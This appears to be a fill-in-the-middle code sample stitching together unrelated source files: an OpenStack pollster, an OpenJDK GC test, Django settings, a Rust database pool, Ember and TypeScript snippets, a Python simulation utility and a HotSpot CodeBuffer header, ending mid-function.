metadata = {
'router_id': fip.get("router_id"),
'status': fip.get("status"),
'floating_network_id': fip.get("floating_network_id"),
'fixed_ip_address': fip.get("fixed_ip_address"),
'port_id': fip.get("port_id"),
'floating_ip_address': fip.get("floating_ip_address")
}
return metadata
def get_samples(self, manager, cache, resources):
for fip in self.neutron_cli.fip_get_all():
status = self.STATUS.get(fip['status'].lower())
if status is None:
LOG.warning(_LW("Invalid status, skipping IP address %s") %
fip['floating_ip_address'])
continue
res_metadata = self._form_metadata_for_fip(fip)
yield sample.Sample(
name='ip.floating',
type=sample.TYPE_GAUGE,
unit='ip',
volume=status,
user_id=fip.get('user_id'),
project_id=fip['tenant_id'],
resource_id=fip['id'],
timestamp=timeutils.utcnow().isoformat(),
resource_metadata=res_metadata
)<|fim▁end|> | # Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the |
<|file_name|>TestVerifySilently.java<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 2014, 2015, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
/* @test TestVerifySilently.java
* @key gc
* @bug 8032771
* @summary Test silent verification.
* @library /testlibrary
* @modules java.base/sun.misc
* java.management
*/
import jdk.test.lib.OutputAnalyzer;
import jdk.test.lib.ProcessTools;
import java.util.ArrayList;
import java.util.Collections;
class RunSystemGC {
public static void main(String args[]) throws Exception {
System.gc();
}
}
public class TestVerifySilently {
private static String[] getTestJavaOpts() {
String testVmOptsStr = System.getProperty("test.java.opts");
if (!testVmOptsStr.isEmpty()) {
return testVmOptsStr.split(" ");
} else {
return new String[] {};
}
}
private static OutputAnalyzer runTest(boolean verifySilently) throws Exception {
ArrayList<String> vmOpts = new ArrayList();
Collections.addAll(vmOpts, getTestJavaOpts());
Collections.addAll(vmOpts, new String[] {"-XX:+UnlockDiagnosticVMOptions",
"-XX:+VerifyDuringStartup",
"-XX:+VerifyBeforeGC",
"-XX:+VerifyAfterGC",<|fim▁hole|> OutputAnalyzer output = new OutputAnalyzer(pb.start());
System.out.println("Output:\n" + output.getOutput());
return output;
}
public static void main(String args[]) throws Exception {
OutputAnalyzer output;
output = runTest(false);
output.shouldContain("Verifying");
output.shouldHaveExitValue(0);
output = runTest(true);
output.shouldNotContain("Verifying");
output.shouldHaveExitValue(0);
}
}<|fim▁end|> | (verifySilently ? "-Xlog:gc":"-Xlog:gc+verify=debug"),
RunSystemGC.class.getName()});
ProcessBuilder pb =
ProcessTools.createJavaProcessBuilder(vmOpts.toArray(new String[vmOpts.size()])); |
<|file_name|>settings.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# ask-undrgz system of questions uses data from underguiz.
# Copyright (c) 2010, Nycholas de Oliveira e Oliveira <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# # Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# # Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# # Neither the name of the Nycholas de Oliveira e Oliveira nor the names of
# its contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Django settings for ask_undrgz project.
import os
ROOT_PATH = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (<|fim▁hole|> ('Nycholas de Oliveira e Oliveira', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Twitter
TWITTER_USERNAME = 'ask_undrgz'
TWITTER_PASSWORD = 'XXX'
TWITTER_CONSUMER_KEY = 'XXX'
TWITTER_CONSUMER_SECRET = 'XXX'
TWITTER_OAUTH_TOKEN = 'XXX'
TWITTER_OAUTH_TOKEN_SECRET = 'XXX'
TWITTER_CALLBACK = 'http://ask-undrgz.appspot.com/_oauth/twitter/callback/'
if DEBUG:
TWITTER_CALLBACK = 'http://localhost:8080/_oauth/twitter/callback/'
ugettext = lambda s: s
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
LANGUAGES = (
('en', ugettext('English')),
('pt-BR', ugettext('Portuguese Brazil')),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'ti*(j(^fvi!&1cu7#sw7mkhb=dgl5v_$1&v5=wom_l4y!x9j*@'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
# 'django.contrib.sessions.middleware.SessionMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# 'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'ask_undrgz.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
ROOT_PATH + '/templates',
)
INSTALLED_APPS = (
# 'django.contrib.auth',
'django.contrib.contenttypes',
# 'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
'ask_undrgz.question',
)<|fim▁end|> | |
<|file_name|>pool.rs<|end_file_name|><|fim▁begin|>use r2d2::Pool;
use r2d2_postgres::PostgresConnectionManager;
use r2d2::Config;
use postgres::SslMode;
use config::DbConfig;
use database::{Database, DatabaseDDL, DatabaseDev};
use platform::Postgres;
#[cfg(feature = "sqlite")]
use platform::Sqlite;
#[cfg(feature = "mysql")]
use platform::Mysql;
#[cfg(feature = "mysql")]
use mysql::conn::pool::MyPool;
#[cfg(feature = "mysql")]
use mysql::conn::MyOpts;
use database::DbError;
#[cfg(feature = "sqlite")]
use r2d2_sqlite::SqliteConnectionManager;
/// the sql builder for each of the database platform
pub enum Platform {
Postgres(Postgres),
#[cfg(feature = "sqlite")]
Sqlite(Sqlite),
Oracle,
#[cfg(feature = "mysql")]
Mysql(Mysql),
}
impl Platform {
pub fn as_ref(&self) -> &Database {
match *self {
Platform::Postgres(ref pg) => pg,
#[cfg(feature = "sqlite")]
Platform::Sqlite(ref lite) => lite,
#[cfg(feature = "mysql")]
Platform::Mysql(ref my) => my,
_ => unimplemented!(),
}
}
pub fn as_ddl(&self) -> &DatabaseDDL {
match *self {
Platform::Postgres(ref pg) => pg,
#[cfg(feature = "sqlite")]
Platform::Sqlite(ref lite) => lite,
#[cfg(feature = "mysql")]
Platform::Mysql(ref my) => my,
_ => unimplemented!(),
}
}
pub fn as_dev(&self) -> &DatabaseDev {
match *self {
Platform::Postgres(ref pg) => pg,
#[cfg(feature = "sqlite")]
Platform::Sqlite(ref lite) => lite,
_ => unimplemented!(),
}
}
}
/// Postgres, Sqlite uses r2d2 connection manager,
/// Mysql has its own connection pooling
pub enum ManagedPool {
Postgres(Pool<PostgresConnectionManager>),
#[cfg(feature = "sqlite")]
Sqlite(Pool<SqliteConnectionManager>),
Oracle,
#[cfg(feature = "mysql")]
Mysql(Option<MyPool>),
}
impl ManagedPool {
/// initialize the pool
pub fn init(url: &str, pool_size: usize) -> Result<Self, DbError> {
let config = DbConfig::from_url(url);
match config {
Some(config) => {
let platform: &str = &config.platform;
match platform {
"postgres" => {
let manager = try!(PostgresConnectionManager::new(url, SslMode::None));
println!("Creating a connection with a pool size of {}", pool_size);
let config = Config::builder().pool_size(pool_size as u32).build();
let pool = try!(Pool::new(config, manager));
Ok(ManagedPool::Postgres(pool))
}
#[cfg(feature = "sqlite")]
"sqlite" => {
let manager = try!(SqliteConnectionManager::new(&config.database));
let config = Config::builder().pool_size(pool_size as u32).build();
let pool = try!(Pool::new(config, manager));
Ok(ManagedPool::Sqlite(pool))
}
#[cfg(feature = "mysql")]
"mysql" => {
let opts = MyOpts {
user: config.username,
pass: config.password,
db_name: Some(config.database),
tcp_addr: Some(config.host.unwrap().to_string()),
tcp_port: config.port.unwrap_or(3306),
..Default::default()
};
let pool = try!(MyPool::new_manual(0, pool_size, opts));
Ok(ManagedPool::Mysql(Some(pool)))
}
_ => unimplemented!(),
}
}
None => {<|fim▁hole|> }
}
/// a conection is created here
pub fn connect(&self) -> Result<Platform, DbError> {
match *self {
ManagedPool::Postgres(ref pool) => {
match pool.get() {
Ok(conn) => {
let pg = Postgres::with_pooled_connection(conn);
Ok(Platform::Postgres(pg))
}
Err(e) => {
Err(DbError::new(&format!("Unable to connect due to {}", e)))
}
}
}
#[cfg(feature = "sqlite")]
ManagedPool::Sqlite(ref pool) => {
match pool.get() {
Ok(conn) => {
let lite = Sqlite::with_pooled_connection(conn);
Ok(Platform::Sqlite(lite))
}
Err(e) => {
Err(DbError::new(&format!("Unable to connect due to {}", e)))
}
}
}
#[cfg(feature = "mysql")]
ManagedPool::Mysql(ref pool) => {
let my = Mysql::with_pooled_connection(pool.clone().unwrap());// I hope cloning doesn't really clone the pool, just the Arc
Ok(Platform::Mysql(my))
}
_ => Err(DbError::new("Any other database is not yet supported")),
}
}
}<|fim▁end|> | println!("Unable to parse url");
Err(DbError::new("Error parsing url"))
} |
<|file_name|>exceptions.py<|end_file_name|><|fim▁begin|>class DestinationNotFoundException(Exception):
pass
class InvalidDateFormat(Exception):<|fim▁hole|><|fim▁end|> | pass |
<|file_name|>Top10Controller.js<|end_file_name|><|fim▁begin|>/*global GLOBE, Em */
GLOBE.Top10Controller = Em.ArrayController.extend({
needs: ['application'],
relays: [],<|fim▁hole|>
actions: {
showRelayDetail: function(fingerprint) {
this.transitionToRoute('relayDetail', fingerprint);
}
}
});<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>__all__ = ["sqlite_dump", "sqlite_merge"]
from random import Random
import math
def random_expectations(depth=0, breadth=3, low=1, high=10, random=Random()):
"""
Generate depth x breadth array of random numbers where each row sums to
high, with a minimum of low.
"""
result = []
if depth == 0:
initial = high + 1
for i in range(breadth - 1):<|fim▁hole|> n = random.randint(low, initial - (low * (breadth - i)))
initial -= n
result.append(n)
result.append(initial - low)
random.shuffle(result)
else:
result = [random_expectations(depth - 1, breadth, low, high, random) for x in range(breadth)]
return result
def rescale(new_low, new_high, low, diff, x):
scaled = (new_high-new_low)*(x - low)
scaled /= diff
return scaled + new_low
def weighted_random_choice(choices, weights, random=Random()):
population = [val for val, cnt in zip(choices, weights) for i in range(int(cnt))]
return random.choice(population)
def multinomial(probabilities, draws=1, random=Random()):
"""
Draw from a multinomial distribution
"""
def pick():
draw = random.random()
bracket = 0.
for i in range(len(probabilities)):
bracket += probabilities[i]
if draw < bracket:
return i
return i
result = [0] * len(probabilities)
for i in range(draws):
result[pick()] += 1
return result
def logistic_random(loc, scale, random=Random()):
"""
Return a random number from a specified logistic distribution.
"""
x = random.random()
return loc + scale * math.log(x / (1 - x))
def shuffled(target, random=Random()):
"""
Return a shuffled version of the argument
"""
a = target[:]
random.shuffle(a)
return a
def make_pbs_script(kwargs, hours=60, mins=0, ppn=16, script_name=None):
"""
Generate a PBS run script to be submitted.
"""
from disclosuregame.Util.sqlite_merge import list_matching
from os.path import split
args_dir, name = split(kwargs.kwargs[0])
kwargs_files = list_matching(args_dir, name)
count = len(kwargs_files)
import sys
args = sys.argv[1:]
args = " ".join(args)
args = args.replace("*", "${PBS_ARRAYID}")
args = args.replace(" %s " % kwargs.file_name, " ${PBS_ARRAYID}_%s " % kwargs.file_name)
if kwargs.file_name == "":
args += " -f ${PBS_ARRAYID}"
interpreter = sys.executable
run_script = ["#!/bin/bash -vx", "#PBS -l walltime=%d:%d:00" % (hours, mins), "#PBS -l nodes=1:ppn=%d" % ppn,
"module load python"]
# Doesn't work on multiple nodes, sadly
# Set up the call
run_call = "%s -m disclosuregame.run %s" % (interpreter, args)
run_script.append(run_call)
# Cleanup after all jobs have run
if script_name is not None:
run_script.append("if [$PBS_ARRAYID -eq %d]" % count)
run_script.append("then")
run_script.append("\trm %s" % script_name)
run_script.append("fi")
return '\n'.join(run_script), count
# ${python} Run.py -R 100 -s ${sig} -r ${resp} --pickled-arguments ../experiment_args/sensitivity_${PBS_ARRAYID}.args -f ${PBS_ARRAYID}_sensitivity -i 1000 -d ${dir} -g ${game}<|fim▁end|> | |
<|file_name|>abstractPropertyInConstructor.ts<|end_file_name|><|fim▁begin|>abstract class AbstractClass {
constructor(str: string, other: AbstractClass) {
this.method(parseInt(str));
let val = this.prop.toLowerCase();
if (!str) {
this.prop = "Hello World";
}
this.cb(str);
// OK, reference is inside function
const innerFunction = () => {
return this.prop;
}
// OK, references are to another instance
other.cb(other.prop);
}
abstract prop: string;
abstract cb: (s: string) => void;
abstract method(num: number): void;
other = this.prop;
fn = () => this.prop;
method2() {
this.prop = this.prop + "!";
}
}
abstract class DerivedAbstractClass extends AbstractClass {
cb = (s: string) => {};
<|fim▁hole|> constructor(str: string, other: AbstractClass, yetAnother: DerivedAbstractClass) {
super(str, other);
// there is no implementation of 'prop' in any base class
this.cb(this.prop.toLowerCase());
this.method(1);
// OK, references are to another instance
other.cb(other.prop);
yetAnother.cb(yetAnother.prop);
}
}
class Implementation extends DerivedAbstractClass {
prop = "";
cb = (s: string) => {};
constructor(str: string, other: AbstractClass, yetAnother: DerivedAbstractClass) {
super(str, other, yetAnother);
this.cb(this.prop);
}
method(n: number) {
this.cb(this.prop + n);
}
}
class User {
constructor(a: AbstractClass) {
a.prop;
a.cb("hi");
a.method(12);
a.method2();
}
}<|fim▁end|> | |
<|file_name|>codeBuffer.hpp<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 1997, 2013, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*
*/
#ifndef SHARE_VM_ASM_CODEBUFFER_HPP
#define SHARE_VM_ASM_CODEBUFFER_HPP
#include "code/oopRecorder.hpp"
#include "code/relocInfo.hpp"
class CodeStrings;
class PhaseCFG;
class Compile;
class BufferBlob;
class CodeBuffer;
class Label;
class CodeOffsets: public StackObj {
public:
enum Entries { Entry,
Verified_Entry,
Frame_Complete, // Offset in the code where the frame setup is (for forte stackwalks) is complete
OSR_Entry,
Dtrace_trap = OSR_Entry, // dtrace probes can never have an OSR entry so reuse it
Exceptions, // Offset where exception handler lives
Deopt, // Offset where deopt handler lives
DeoptMH, // Offset where MethodHandle deopt handler lives
UnwindHandler, // Offset to default unwind handler
max_Entries };
// special value to note codeBlobs where profile (forte) stack walking is
// always dangerous and suspect.
enum { frame_never_safe = -1 };
private:
int _values[max_Entries];
public:
CodeOffsets() {
_values[Entry ] = 0;
_values[Verified_Entry] = 0;
_values[Frame_Complete] = frame_never_safe;
_values[OSR_Entry ] = 0;
_values[Exceptions ] = -1;
_values[Deopt ] = -1;
_values[DeoptMH ] = -1;
_values[UnwindHandler ] = -1;
}
int value(Entries e) { return _values[e]; }
void set_value(Entries e, int val) { _values[e] = val; }
};
// This class represents a stream of code and associated relocations.
// There are a few in each CodeBuffer.
// They are filled concurrently, and concatenated at the end.
class CodeSection VALUE_OBJ_CLASS_SPEC {
friend class CodeBuffer;
public:
typedef int csize_t; // code size type; would be size_t except for history
private:
address _start; // first byte of contents (instructions)
address _mark; // user mark, usually an instruction beginning
address _end; // current end address
address _limit; // last possible (allocated) end address
relocInfo* _locs_start; // first byte of relocation information
relocInfo* _locs_end; // first byte after relocation information
relocInfo* _locs_limit; // first byte after relocation information buf
address _locs_point; // last relocated position (grows upward)
bool _locs_own; // did I allocate the locs myself?
bool _frozen; // no more expansion of this section
char _index; // my section number (SECT_INST, etc.)
CodeBuffer* _outer; // enclosing CodeBuffer
// (Note: _locs_point used to be called _last_reloc_offset.)
CodeSection() {
_start = NULL;
_mark = NULL;
_end = NULL;
_limit = NULL;
_locs_start = NULL;
_locs_end = NULL;
_locs_limit = NULL;
_locs_point = NULL;
_locs_own = false;
_frozen = false;
debug_only(_index = (char)-1);
debug_only(_outer = (CodeBuffer*)badAddress);
}
void initialize_outer(CodeBuffer* outer, int index) {
_outer = outer;
_index = index;
}
void initialize(address start, csize_t size = 0) {
assert(_start == NULL, "only one init step, please");
_start = start;
_mark = NULL;
_end = start;
_limit = start + size;
_locs_point = start;
}
void initialize_locs(int locs_capacity);
void expand_locs(int new_capacity);
void initialize_locs_from(const CodeSection* source_cs);
// helper for CodeBuffer::expand()
void take_over_code_from(CodeSection* cs) {
_start = cs->_start;
_mark = cs->_mark;
_end = cs->_end;
_limit = cs->_limit;
_locs_point = cs->_locs_point;
}
public:
address start() const { return _start; }
address mark() const { return _mark; }
address end() const { return _end; }
address limit() const { return _limit; }
csize_t size() const { return (csize_t)(_end - _start); }
csize_t mark_off() const { assert(_mark != NULL, "not an offset");
return (csize_t)(_mark - _start); }
csize_t capacity() const { return (csize_t)(_limit - _start); }
csize_t remaining() const { return (csize_t)(_limit - _end); }
relocInfo* locs_start() const { return _locs_start; }
relocInfo* locs_end() const { return _locs_end; }
int locs_count() const { return (int)(_locs_end - _locs_start); }
relocInfo* locs_limit() const { return _locs_limit; }
address locs_point() const { return _locs_point; }
csize_t locs_point_off() const{ return (csize_t)(_locs_point - _start); }
csize_t locs_capacity() const { return (csize_t)(_locs_limit - _locs_start); }
csize_t locs_remaining()const { return (csize_t)(_locs_limit - _locs_end); }
int index() const { return _index; }
bool is_allocated() const { return _start != NULL; }
bool is_empty() const { return _start == _end; }
bool is_frozen() const { return _frozen; }
bool has_locs() const { return _locs_end != NULL; }
CodeBuffer* outer() const { return _outer; }
// is a given address in this section? (2nd version is end-inclusive)
bool contains(address pc) const { return pc >= _start && pc < _end; }
bool contains2(address pc) const { return pc >= _start && pc <= _end; }
bool allocates(address pc) const { return pc >= _start && pc < _limit; }
bool allocates2(address pc) const { return pc >= _start && pc <= _limit; }
void set_end(address pc) { assert(allocates2(pc), err_msg("not in CodeBuffer memory: " PTR_FORMAT " <= " PTR_FORMAT " <= " PTR_FORMAT, _start, pc, _limit)); _end = pc; }
void set_mark(address pc) { assert(contains2(pc), "not in codeBuffer");
_mark = pc; }
void set_mark_off(int offset) { assert(contains2(offset+_start),"not in codeBuffer");
_mark = offset + _start; }
void set_mark() { _mark = _end; }
void clear_mark() { _mark = NULL; }
void set_locs_end(relocInfo* p) {
assert(p <= locs_limit(), "locs data fits in allocated buffer");
_locs_end = p;
}
void set_locs_point(address pc) {
assert(pc >= locs_point(), "relocation addr may not decrease");
assert(allocates2(pc), "relocation addr must be in this section");
_locs_point = pc;
}
// Code emission
void emit_int8 ( int8_t x) { *((int8_t*) end()) = x; set_end(end() + sizeof(int8_t)); }
void emit_int16( int16_t x) { *((int16_t*) end()) = x; set_end(end() + sizeof(int16_t)); }
void emit_int32( int32_t x) { *((int32_t*) end()) = x; set_end(end() + sizeof(int32_t)); }
void emit_int64( int64_t x) { *((int64_t*) end()) = x; set_end(end() + sizeof(int64_t)); }
void emit_float( jfloat x) { *((jfloat*) end()) = x; set_end(end() + sizeof(jfloat)); }
void emit_double(jdouble x) { *((jdouble*) end()) = x; set_end(end() + sizeof(jdouble)); }
void emit_address(address x) { *((address*) end()) = x; set_end(end() + sizeof(address)); }
// Share a scratch buffer for relocinfo. (Hacky; saves a resource allocation.)
void initialize_shared_locs(relocInfo* buf, int length);
// Manage labels and their addresses.
address target(Label& L, address branch_pc);
// Emit a relocation.
void relocate(address at, RelocationHolder const& rspec, int format = 0);
void relocate(address at, relocInfo::relocType rtype, int format = 0) {
if (rtype != relocInfo::none)
relocate(at, Relocation::spec_simple(rtype), format);
}
// alignment requirement for starting offset
// Requirements are that the instruction area and the
// stubs area must start on CodeEntryAlignment, and
// the ctable on sizeof(jdouble)
int alignment() const { return MAX2((int)sizeof(jdouble), (int)CodeEntryAlignment); }
// Slop between sections, used only when allocating temporary BufferBlob buffers.
static csize_t end_slop() { return MAX2((int)sizeof(jdouble), (int)CodeEntryAlignment); }
csize_t align_at_start(csize_t off) const { return (csize_t) align_size_up(off, alignment()); }
<|fim▁hole|> // Mark a section frozen. Assign its remaining space to
// the following section. It will never expand after this point.
inline void freeze(); // { _outer->freeze_section(this); }
// Ensure there's enough space left in the current section.
// Return true if there was an expansion.
bool maybe_expand_to_ensure_remaining(csize_t amount);
#ifndef PRODUCT
void decode();
void dump();
void print(const char* name);
#endif //PRODUCT
};
class CodeString;
class CodeStrings VALUE_OBJ_CLASS_SPEC {
private:
#ifndef PRODUCT
CodeString* _strings;
#endif
CodeString* find(intptr_t offset) const;
CodeString* find_last(intptr_t offset) const;
public:
CodeStrings() {
#ifndef PRODUCT
_strings = NULL;
#endif
}
const char* add_string(const char * string) PRODUCT_RETURN_(return NULL;);
void add_comment(intptr_t offset, const char * comment) PRODUCT_RETURN;
void print_block_comment(outputStream* stream, intptr_t offset) const PRODUCT_RETURN;
void assign(CodeStrings& other) PRODUCT_RETURN;
void free() PRODUCT_RETURN;
};
// A CodeBuffer describes a memory space into which assembly
// code is generated. This memory space usually occupies the
// interior of a single BufferBlob, but in some cases it may be
// an arbitrary span of memory, even outside the code cache.
//
// A code buffer comes in two variants:
//
// (1) A CodeBuffer referring to an already allocated piece of memory:
// This is used to direct 'static' code generation (e.g. for interpreter
// or stubroutine generation, etc.). This code comes with NO relocation
// information.
//
// (2) A CodeBuffer referring to a piece of memory allocated when the
// CodeBuffer is allocated. This is used for nmethod generation.
//
// The memory can be divided up into several parts called sections.
// Each section independently accumulates code (or data) an relocations.
// Sections can grow (at the expense of a reallocation of the BufferBlob
// and recopying of all active sections). When the buffered code is finally
// written to an nmethod (or other CodeBlob), the contents (code, data,
// and relocations) of the sections are padded to an alignment and concatenated.
// Instructions and data in one section can contain relocatable references to
// addresses in a sibling section.
class CodeBuffer: public StackObj {
friend class CodeSection;
private:
// CodeBuffers must be allocated on the stack except for a single
// special case during expansion which is handled internally. This
// is done to guarantee proper cleanup of resources.
void* operator new(size_t size) throw() { return ResourceObj::operator new(size); }
void operator delete(void* p) { ShouldNotCallThis(); }
public:
typedef int csize_t; // code size type; would be size_t except for history
enum {
// Here is the list of all possible sections. The order reflects
// the final layout.
SECT_FIRST = 0,
SECT_CONSTS = SECT_FIRST, // Non-instruction data: Floats, jump tables, etc.
SECT_INSTS, // Executable instructions.
SECT_STUBS, // Outbound trampolines for supporting call sites.
SECT_LIMIT, SECT_NONE = -1
};
private:
enum {
sect_bits = 2, // assert (SECT_LIMIT <= (1<<sect_bits))
sect_mask = (1<<sect_bits)-1
};
const char* _name;
CodeSection _consts; // constants, jump tables
CodeSection _insts; // instructions (the main section)
CodeSection _stubs; // stubs (call site support), deopt, exception handling
CodeBuffer* _before_expand; // dead buffer, from before the last expansion
BufferBlob* _blob; // optional buffer in CodeCache for generated code
address _total_start; // first address of combined memory buffer
csize_t _total_size; // size in bytes of combined memory buffer
OopRecorder* _oop_recorder;
CodeStrings _strings;
OopRecorder _default_oop_recorder; // override with initialize_oop_recorder
Arena* _overflow_arena;
address _decode_begin; // start address for decode
address decode_begin();
void initialize_misc(const char * name) {
// all pointers other than code_start/end and those inside the sections
assert(name != NULL, "must have a name");
_name = name;
_before_expand = NULL;
_blob = NULL;
_oop_recorder = NULL;
_decode_begin = NULL;
_overflow_arena = NULL;
}
void initialize(address code_start, csize_t code_size) {
_consts.initialize_outer(this, SECT_CONSTS);
_insts.initialize_outer(this, SECT_INSTS);
_stubs.initialize_outer(this, SECT_STUBS);
_total_start = code_start;
_total_size = code_size;
// Initialize the main section:
_insts.initialize(code_start, code_size);
assert(!_stubs.is_allocated(), "no garbage here");
assert(!_consts.is_allocated(), "no garbage here");
_oop_recorder = &_default_oop_recorder;
}
void initialize_section_size(CodeSection* cs, csize_t size);
void freeze_section(CodeSection* cs);
// helper for CodeBuffer::expand()
void take_over_code_from(CodeBuffer* cs);
// ensure sections are disjoint, ordered, and contained in the blob
void verify_section_allocation();
// copies combined relocations to the blob, returns bytes copied
// (if target is null, it is a dry run only, just for sizing)
csize_t copy_relocations_to(CodeBlob* blob) const;
// copies combined code to the blob (assumes relocs are already in there)
void copy_code_to(CodeBlob* blob);
// moves code sections to new buffer (assumes relocs are already in there)
void relocate_code_to(CodeBuffer* cb) const;
// set up a model of the final layout of my contents
void compute_final_layout(CodeBuffer* dest) const;
// Expand the given section so at least 'amount' is remaining.
// Creates a new, larger BufferBlob, and rewrites the code & relocs.
void expand(CodeSection* which_cs, csize_t amount);
// Helper for expand.
csize_t figure_expanded_capacities(CodeSection* which_cs, csize_t amount, csize_t* new_capacity);
public:
// (1) code buffer referring to pre-allocated instruction memory
CodeBuffer(address code_start, csize_t code_size) {
assert(code_start != NULL, "sanity");
initialize_misc("static buffer");
initialize(code_start, code_size);
verify_section_allocation();
}
// (2) CodeBuffer referring to pre-allocated CodeBlob.
CodeBuffer(CodeBlob* blob);
// (3) code buffer allocating codeBlob memory for code & relocation
// info but with lazy initialization. The name must be something
// informative.
CodeBuffer(const char* name) {
initialize_misc(name);
}
// (4) code buffer allocating codeBlob memory for code & relocation
// info. The name must be something informative and code_size must
// include both code and stubs sizes.
CodeBuffer(const char* name, csize_t code_size, csize_t locs_size) {
initialize_misc(name);
initialize(code_size, locs_size);
}
~CodeBuffer();
// Initialize a CodeBuffer constructed using constructor 3. Using
// constructor 4 is equivalent to calling constructor 3 and then
// calling this method. It's been factored out for convenience of
// construction.
void initialize(csize_t code_size, csize_t locs_size);
CodeSection* consts() { return &_consts; }
CodeSection* insts() { return &_insts; }
CodeSection* stubs() { return &_stubs; }
// present sections in order; return NULL at end; consts is #0, etc.
CodeSection* code_section(int n) {
// This makes the slightly questionable but portable assumption
// that the various members (_consts, _insts, _stubs, etc.) are
// adjacent in the layout of CodeBuffer.
CodeSection* cs = &_consts + n;
